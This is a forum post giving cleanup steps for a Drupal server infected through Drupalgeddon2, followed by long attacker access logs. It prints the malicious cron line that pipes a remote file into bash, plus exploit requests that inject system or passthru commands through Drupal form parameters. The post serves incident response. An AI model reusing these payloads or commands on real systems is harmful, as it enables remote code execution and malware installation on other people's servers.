Linux Suppoie Drupal Removal

Jackbox

Active Member
Jan 2, 2016
197
96
74
Detecting this
  • cd /var/tmp; ls -la
  • Notice the user/group as this is how the crontab was setup.
For example if you see
Code:
[root@XXXX tmp]# cd /var/tmp;ls -la
total 704
drwxrwxrwt.  2 root   root    4096 Apr 24 18:22 .
drwxr-xr-x. 23 root   root    4096 Aug  6  2013 ..
-rw-r--r--   1 apache admin   2006 May  2 11:21 config.json
-rwxrwxrwx   1 apache admin 707863 May  2 11:14 suppoie

Notice how suppoie is under the user apache.

So then you could enter:
Code:
sudo crontab -e -u apache

I am going to remove:
* * * * * curl -s http://azadarimarkaz.com/logo7.jpg | bash -s

Now we need to take care of the files inside /var/tmp

The above is a config.json file, this will be owned by the same user (apache) in our case. Other times this user is www-date and similar. We will remove two files from /var/tmp.

Code:
rm config.json suppoie

Code:
158.69.133.31 - - [29/Apr/2018:16:01:59 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [29/Apr/2018:16:02:00 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [29/Apr/2018:16:02:50 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [29/Apr/2018:16:02:51 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [29/Apr/2018:16:26:40 -0400] "POST /ps.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [29/Apr/2018:16:26:40 -0400] "POST /ps.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [29/Apr/2018:18:16:48 -0400] "GET /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [29/Apr/2018:18:16:49 -0400] "GET /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [01/May/2018:05:06:14 -0400] "POST /ps.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [01/May/2018:05:06:14 -0400] "POST /ps.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [01/May/2018:05:06:17 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [01/May/2018:05:06:17 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [15/Apr/2018:18:02:24 -0400] "POST /user/register?element_parents=account%2Fmail%2F%23value&_wrapper_format=drupal_ajax&ajax_form=1 HTTP/1.1" 403 23929 "-" "python-requests/2.18.4"
158.69.133.31 - - [15/Apr/2018:18:02:26 -0400] "POST /user/register?element_parents=account%2Fmail%2F%23value&_wrapper_format=drupal_ajax&ajax_form=1 HTTP/1.1" 403 23929 "-" "python-requests/2.18.4"
158.69.133.31 - - [16/Apr/2018:17:38:05 -0400] "POST /user/register?element_parents=account%2Fmail%2F%23value&_wrapper_format=drupal_ajax&ajax_form=1 HTTP/1.1" 403 23929 "-" "python-requests/2.18.4"
158.69.133.31 - - [16/Apr/2018:17:38:06 -0400] "POST /user/register?element_parents=account%2Fmail%2F%23value&_wrapper_format=drupal_ajax&ajax_form=1 HTTP/1.1" 403 23929 "-" "python-requests/2.18.4"
158.69.133.31 - - [19/Apr/2018:02:57:40 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [19/Apr/2018:02:57:41 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [19/Apr/2018:03:43:26 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [19/Apr/2018:03:43:26 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [19/Apr/2018:12:16:55 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [19/Apr/2018:12:16:55 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [19/Apr/2018:22:47:30 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [19/Apr/2018:22:47:31 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [20/Apr/2018:00:44:22 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [20/Apr/2018:00:44:23 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [20/Apr/2018:16:51:18 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [20/Apr/2018:16:51:18 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [20/Apr/2018:16:53:44 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [20/Apr/2018:16:53:44 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [20/Apr/2018:18:54:59 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [20/Apr/2018:18:55:00 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [21/Apr/2018:13:21:33 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [21/Apr/2018:13:21:34 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [21/Apr/2018:14:08:44 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [21/Apr/2018:14:08:44 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [21/Apr/2018:14:14:08 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [21/Apr/2018:14:14:08 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [21/Apr/2018:15:51:36 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [21/Apr/2018:15:51:36 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [21/Apr/2018:16:53:55 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [21/Apr/2018:16:53:56 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [21/Apr/2018:23:37:27 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [21/Apr/2018:23:37:27 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [23/Apr/2018:01:40:04 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [23/Apr/2018:01:40:04 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [25/Apr/2018:01:25:17 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [25/Apr/2018:01:25:17 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [25/Apr/2018:01:27:02 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [25/Apr/2018:01:27:02 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [25/Apr/2018:01:27:26 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [25/Apr/2018:01:27:26 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [25/Apr/2018:03:45:21 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [25/Apr/2018:03:45:22 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [26/Apr/2018:17:46:27 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [26/Apr/2018:17:46:28 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [26/Apr/2018:17:46:28 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [26/Apr/2018:17:46:28 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [26/Apr/2018:17:48:46 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [26/Apr/2018:17:48:46 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [26/Apr/2018:17:49:23 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [26/Apr/2018:17:49:23 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [26/Apr/2018:20:00:32 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [26/Apr/2018:20:00:32 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [27/Apr/2018:23:27:51 -0400] "POST /ps.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [27/Apr/2018:23:27:52 -0400] "POST /ps.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [27/Apr/2018:23:59:49 -0400] "POST /ps.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [27/Apr/2018:23:59:49 -0400] "POST /ps.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [28/Apr/2018:01:09:42 -0400] "GET /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [28/Apr/2018:01:09:43 -0400] "GET /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [29/Apr/2018:16:01:59 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [29/Apr/2018:16:02:00 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [29/Apr/2018:16:02:50 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [29/Apr/2018:16:02:51 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [29/Apr/2018:16:26:40 -0400] "POST /ps.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [29/Apr/2018:16:26:40 -0400] "POST /ps.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [29/Apr/2018:18:16:48 -0400] "GET /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [29/Apr/2018:18:16:49 -0400] "GET /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [01/May/2018:05:06:14 -0400] "POST /ps.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [01/May/2018:05:06:14 -0400] "POST /ps.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [01/May/2018:05:06:17 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [01/May/2018:05:06:17 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [15/Apr/2018:18:02:24 -0400] "POST /user/register?element_parents=account%2Fmail%2F%23value&_wrapper_format=drupal_ajax&ajax_form=1 HTTP/1.1" 403 23929 "-" "python-requests/2.18.4"
158.69.133.31 - - [15/Apr/2018:18:02:26 -0400] "POST /user/register?element_parents=account%2Fmail%2F%23value&_wrapper_format=drupal_ajax&ajax_form=1 HTTP/1.1" 403 23929 "-" "python-requests/2.18.4"
158.69.133.31 - - [16/Apr/2018:17:38:05 -0400] "POST /user/register?element_parents=account%2Fmail%2F%23value&_wrapper_format=drupal_ajax&ajax_form=1 HTTP/1.1" 403 23929 "-" "python-requests/2.18.4"
158.69.133.31 - - [16/Apr/2018:17:38:06 -0400] "POST /user/register?element_parents=account%2Fmail%2F%23value&_wrapper_format=drupal_ajax&ajax_form=1 HTTP/1.1" 403 23929 "-" "python-requests/2.18.4"
158.69.133.31 - - [19/Apr/2018:02:57:40 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [19/Apr/2018:02:57:41 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [19/Apr/2018:03:43:26 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [19/Apr/2018:03:43:26 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [19/Apr/2018:12:16:55 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [19/Apr/2018:12:16:55 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [19/Apr/2018:22:47:30 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [19/Apr/2018:22:47:31 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [20/Apr/2018:00:44:22 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [20/Apr/2018:00:44:23 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [20/Apr/2018:16:51:18 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [20/Apr/2018:16:51:18 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [20/Apr/2018:16:53:44 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [20/Apr/2018:16:53:44 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [20/Apr/2018:18:54:59 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [20/Apr/2018:18:55:00 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [21/Apr/2018:13:21:33 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [21/Apr/2018:13:21:34 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [21/Apr/2018:14:08:44 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [21/Apr/2018:14:08:44 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [21/Apr/2018:14:14:08 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl[Sun Apr 29 03:49:01 2018] [notice] Digest: generating secret for digest authentication ...
158.69.133.31 - - [29/Apr/2018:15:25:56 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [29/Apr/2018:15:25:57 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [29/Apr/2018:15:26:03 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [29/Apr/2018:15:26:04 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [29/Apr/2018:15:47:39 -0400] "POST /ps.php HTTP/1.1" 302 -
158.69.133.31 - - [29/Apr/2018:15:47:39 -0400] "POST /ps.php HTTP/1.1" 302 -
158.69.133.31 - - [01/May/2018:04:29:02 -0400] "POST /ps.php HTTP/1.1" 302 -
158.69.133.31 - - [01/May/2018:04:29:03 -0400] "POST /ps.php HTTP/1.1" 302 -
158.69.133.31 - - [01/May/2018:04:29:10 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [01/May/2018:04:29:11 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [15/Apr/2018:18:02:34 -0400] "POST /user/register?element_parents=account%2Fmail%2F%23value&_wrapper_format=drupal_ajax&ajax_form=1 HTTP/1.1" 403 23943
158.69.133.31 - - [15/Apr/2018:18:02:35 -0400] "POST /user/register?element_parents=account%2Fmail%2F%23value&_wrapper_format=drupal_ajax&ajax_form=1 HTTP/1.1" 403 23943
158.69.133.31 - - [18/Apr/2018:23:17:14 -0400] "POST /user/register?element_parents=account%2Fmail%2F%23value&_wrapper_format=drupal_ajax&ajax_form=1 HTTP/1.1" 403 23943
158.69.133.31 - - [18/Apr/2018:23:17:16 -0400] "POST /user/register?element_parents=account%2Fmail%2F%23value&_wrapper_format=drupal_ajax&ajax_form=1 HTTP/1.1" 403 23943
158.69.133.31 - - [20/Apr/2018:16:26:09 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [20/Apr/2018:16:26:09 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [20/Apr/2018:16:30:24 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [20/Apr/2018:16:30:25 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [21/Apr/2018:12:43:57 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [21/Apr/2018:12:43:57 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [21/Apr/2018:13:47:50 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [21/Apr/2018:13:47:50 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [21/Apr/2018:13:47:51 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [21/Apr/2018:13:47:51 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [23/Apr/2018:01:04:14 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [23/Apr/2018:01:04:14 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [23/Apr/2018:22:08:33 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613
158.69.133.31 - - [23/Apr/2018:22:08:33 -0400] "POST /?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=echo%20YCRACFZQ HTTP/1.1" 200 25074
158.69.133.31 - - [23/Apr/2018:22:08:34 -0400] "POST /?q=file/ajax/name/%23value/form-wwnz2VlGib1c30rourfLnqE4STxWpRRg4blk4vEGQew HTTP/1.1" 200 -
158.69.133.31 - - [23/Apr/2018:22:08:34 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613
158.69.133.31 - - [24/Apr/2018:19:35:07 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613
158.69.133.31 - - [24/Apr/2018:19:35:07 -0400] "POST /?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=echo%20IDIGOSMV HTTP/1.1" 200 25074
158.69.133.31 - - [24/Apr/2018:19:35:08 -0400] "POST /?q=file/ajax/name/%23value/form-b74ZyRbU0FSIK7VVUgrWzVOxOFOkiSejGhKR2Us1X-c HTTP/1.1" 200 -
158.69.133.31 - - [24/Apr/2018:19:35:08 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613
158.69.133.31 - - [24/Apr/2018:21:16:46 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613
158.69.133.31 - - [24/Apr/2018:21:16:46 -0400] "POST /?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=echo%20GITILURK HTTP/1.1" 200 25074
158.69.133.31 - - [24/Apr/2018:21:16:47 -0400] "POST /?q=file/ajax/name/%23value/form-ygTPrNJNU_hZhAPCDwHtO_zKjfYP6Doo06VhjU5NVwI HTTP/1.1" 200 -
158.69.133.31 - - [24/Apr/2018:21:16:47 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613
158.69.133.31 - - [26/Apr/2018:17:12:12 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [26/Apr/2018:17:12:12 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [26/Apr/2018:17:12:12 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [26/Apr/2018:17:12:12 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [26/Apr/2018:17:12:29 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [26/Apr/2018:17:12:30 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [27/Apr/2018:22:49:56 -0400] "POST /ps.php HTTP/1.1" 302 -
158.69.133.31 - - [27/Apr/2018:22:49:57 -0400] "POST /ps.php HTTP/1.1" 302 -
158.69.133.31 - - [27/Apr/2018:23:21:54 -0400] "POST /ps.php HTTP/1.1" 302 -
158.69.133.31 - - [27/Apr/2018:23:21:54 -0400] "POST /ps.php HTTP/1.1" 302 -
[29/Apr/2018:15:25:56 -0400] 158.69.133.31 TLSv1 AES128-SHA "POST /loikfd.php HTTP/1.1" -
[29/Apr/2018:15:25:57 -0400] 158.69.133.31 TLSv1 AES128-SHA "POST /loikfd.php HTTP/1.1" -
[29/Apr/2018:15:26:03 -0400] 158.69.133.31 TLSv1 AES128-SHA "POST /loikfd.php HTTP/1.1" -
[29/Apr/2018:15:26:04 -0400] 158.69.133.31 TLSv1 AES128-SHA "POST /loikfd.php HTTP/1.1" -
[29/Apr/2018:15:47:39 -0400] 158.69.133.31 TLSv1 AES128-SHA "POST /ps.php HTTP/1.1" -
[29/Apr/2018:15:47:39 -0400] 158.69.133.31 TLSv1 AES128-SHA "POST /ps.php HTTP/1.1" -
[01/May/2018:04:29:02 -0400] 158.69.133.31 TLSv1 AES128-SHA "POST /ps.php HTTP/1.1" -
[01/May/2018:04:29:03 -0400] 158.69.133.31 TLSv1 AES128-SHA "POST /ps.php HTTP/1.1" -
[01/May/2018:04:29:10 -0400] 158.69.133.31 TLSv1 AES128-SHA "POST /loikfd.php HTTP/1.1" -
[01/May/2018:04:29:11 -0400] 158.69.133.31 TLSv1 AES128-SHA "POST /loikfd.php HTTP/1.1" -
[15/Apr/2018:18:02:34 -0400] 158.69.133.31 TLSv1 DHE-RSA-AES256-SHA "POST /user/register?element_parents=account%2Fmail%2F%23value&_wrapper_format=drupal_ajax&ajax_form=1 HTTP/1.1" 23943
[15/Apr/2018:18:02:35 -0400] 158.69.133.31 TLSv1 DHE-RSA-AES256-SHA "POST /user/register?element_parents=account%2Fmail%2F%23value&_wrapper_format=drupal_ajax&ajax_form=1 HTTP/1.1" 23943
[18/Apr/2018:23:17:14 -0400] 158.69.133.31 TLSv1 DHE-RSA-AES256-SHA "POST /user/register?element_parents=account%2Fmail%2F%23value&_wrapper_format=drupal_ajax&ajax_form=1 HTTP/1.1" 23943
[18/Apr/2018:23:17:16 -0400] 158.69.133.31 TLSv1 DHE-RSA-AES256-SHA "POST /user/register?element_parents=account%2Fmail%2F%23value&_wrapper_format=drupal_ajax&ajax_form=1 HTTP/1.1" 23943
[20/Apr/2018:16:26:09 -0400] 158.69.133.31 TLSv1 AES128-SHA "POST /loikfd.php HTTP/1.1" -
[20/Apr/2018:16:26:09 -0400] 158.69.133.31 TLSv1 AES128-SHA "POST /loikfd.php HTTP/1.1" -
[20/Apr/2018:16:30:24 -0400] 158.69.133.31 TLSv1 AES128-SHA "POST /loikfd.php HTTP/1.1" -
[20/Apr/2018:16:30:25 -0400] 158.69.133.31 TLSv1 AES128-SHA "POST /loikfd.php HTTP/1.1" -
[21/Apr/2018:12:43:57 -0400] 158.69.133.31 TLSv1 AES128-SHA "POST /loikfd.php HTTP/1.1" -
[21/Apr/2018:12:43:57 -0400] 158.69.133.31 TLSv1 AES128-SHA "POST /loikfd.php HTTP/1.1" -
[21/Apr/2018:13:47:50 -0400] 158.69.133.31 TLSv1 AES128-SHA "POST /loikfd.php HTTP/1.1" -
[21/Apr/2018:13:47:50 -0400] 158.69.133.31 TLSv1 AES128-SHA "POST /loikfd.php HTTP/1.1" -
[21/Apr/2018:13:47:51 -0400] 158.69.133.31 TLSv1 AES128-SHA "POST /loikfd.php HTTP/1.1" -
[21/Apr/2018:13:47:51 -0400] 158.69.133.31 TLSv1 AES128-SHA "POST /loikfd.php HTTP/1.1" -
[23/Apr/2018:01:04:14 -0400] 158.69.133.31 TLSv1 AES128-SHA "POST /loikfd.php HTTP/1.1" -
[23/Apr/2018:01:04:14 -0400] 158.69.133.31 TLSv1 AES128-SHA "POST /loikfd.php HTTP/1.1" -
[23/Apr/2018:22:08:33 -0400] 158.69.133.31 TLSv1 DHE-RSA-AES128-SHA "POST /CHANGELOG.txt HTTP/1.1" 111613
[23/Apr/2018:22:08:33 -0400] 158.69.133.31 TLSv1 DHE-RSA-AES128-SHA "POST /?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=echo%20YCRACFZQ HTTP/1.1" 25074
[23/Apr/2018:22:08:34 -0400] 158.69.133.31 TLSv1 DHE-RSA-AES128-SHA "POST /?q=file/ajax/name/%23value/form-wwnz2VlGib1c30rourfLnqE4STxWpRRg4blk4vEGQew HTTP/1.1" -
[23/Apr/2018:22:08:34 -0400] 158.69.133.31 TLSv1 DHE-RSA-AES128-SHA "POST /CHANGELOG.txt HTTP/1.1" 111613
[24/Apr/2018:19:35:07 -0400] 158.69.133.31 TLSv1 DHE-RSA-AES128-SHA "POST /CHANGELOG.txt HTTP/1.1" 111613
[24/Apr/2018:19:35:07 -0400] 158.69.133.31 TLSv1 DHE-RSA-AES128-SHA "POST /?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=echo%20IDIGOSMV HTTP/1.1" 25074
[24/Apr/2018:19:35:08 -0400] 158.69.133.31 TLSv1 DHE-RSA-AES128-SHA "POST /?q=file/ajax/name/%23value/form-b74ZyRbU0FSIK7VVUgrWzVOxOFOkiSejGhKR2Us1X-c HTTP/1.1" -
[24/Apr/2018:19:35:08 -0400] 158.69.133.31 TLSv1 DHE-RSA-AES128-SHA "POST /CHANGELOG.txt HTTP/1.1" 111613
[24/Apr/2018:21:16:46 -0400] 158.69.133.31 TLSv1 DHE-RSA-AES128-SHA "POST /CHANGELOG.txt HTTP/1.1" 111613
[24/Apr/2018:21:16:46 -0400] 158.69.133.31 TLSv1 DHE-RSA-AES128-SHA "POST /?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=echo%20GITILURK HTTP/1.1" 25074
[24/Apr/2018:21:16:47 -0400] 158.69.133.31 TLSv1 DHE-RSA-AES128-SHA "POST /?q=file/ajax/name/%23value/form-ygTPrNJNU_hZhAPCDwHtO_zKjfYP6Doo06VhjU5NVwI HTTP/1.1" -
[24/Apr/2018:21:16:47 -0400] 158.69.133.31 TLSv1 DHE-RSA-AES128-SHA "POST /CHANGELOG.txt HTTP/1.1" 111613
[26/Apr/2018:17:12:12 -0400] 158.69.133.31 TLSv1 AES128-SHA "POST /loikfd.php HTTP/1.1" -
[26/Apr/2018:17:12:12 -0400] 158.69.133.31 TLSv1 AES128-SHA "POST /loikfd.php HTTP/1.1" -
[26/Apr/2018:17:12:12 -0400] 158.69.133.31 TLSv1 AES128-SHA "POST /loikfd.php HTTP/1.1" -

....

Code:
[root@XXXX httpd]# cat * | grep "logo7.jpg"
185.169.255.18 - - [29/Apr/2018:20:39:02 -0400] "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://azadarimarkaz.com/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 200 25257
86.127.10.162 - - [01/May/2018:11:00:24 -0400] "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://azadarimarkaz.com/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 200 25257
81.92.203.123 - - [24/Apr/2018:18:22:34 -0400] "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://gmicameroon.com/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 200 25249
81.92.203.123 - - [24/Apr/2018:22:20:01 -0400] "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://gmicameroon.com/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 200 25249
185.38.150.119 - - [25/Apr/2018:11:46:21 -0400] "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://gmicameroon.com/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 200 25249
